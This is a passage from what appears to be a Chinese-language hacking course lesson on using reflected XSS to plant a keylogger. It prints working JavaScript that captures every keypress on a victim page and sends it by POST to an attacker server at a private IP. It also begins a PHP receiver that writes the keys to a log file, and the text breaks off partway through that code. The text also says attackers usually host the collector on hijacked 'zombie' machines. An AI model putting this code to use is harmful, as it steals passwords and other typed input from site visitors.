2. XSS- 键盘记录器和反射型XSS
任务099:XSS- 键盘记录器和反射型XSS 进行xss利用进行键盘记录发送给黑客 黑客的服务器大部分但是用的肉鸡服务器 1 . 创建一个Keylogger.js文件 下面文件内容 意思就是将输入的内容发送给服务器 http://192.168.55.26/keylogger.php 文件 document.onkeypress = function(evt) { evt = evt || window.event key = String.fromCharCode(evt.charCode) if (key) { var http = new XMLHttpRequest(); var param = encodeURI(key) http.open("POST","http://192.168.55.26/keylogger.php",true); http.setRequestHeader("Content-type","application/x-www-form- urlencoded"); http.send("key="+param); } } 2. 在创建一个文件Keylogger.php代码用来接受键盘打的字保存到keylog.txt里 在将接受里的key参数也就是键盘输入的保存到keylog.txt文件里 <?php $key=$_POST['key'];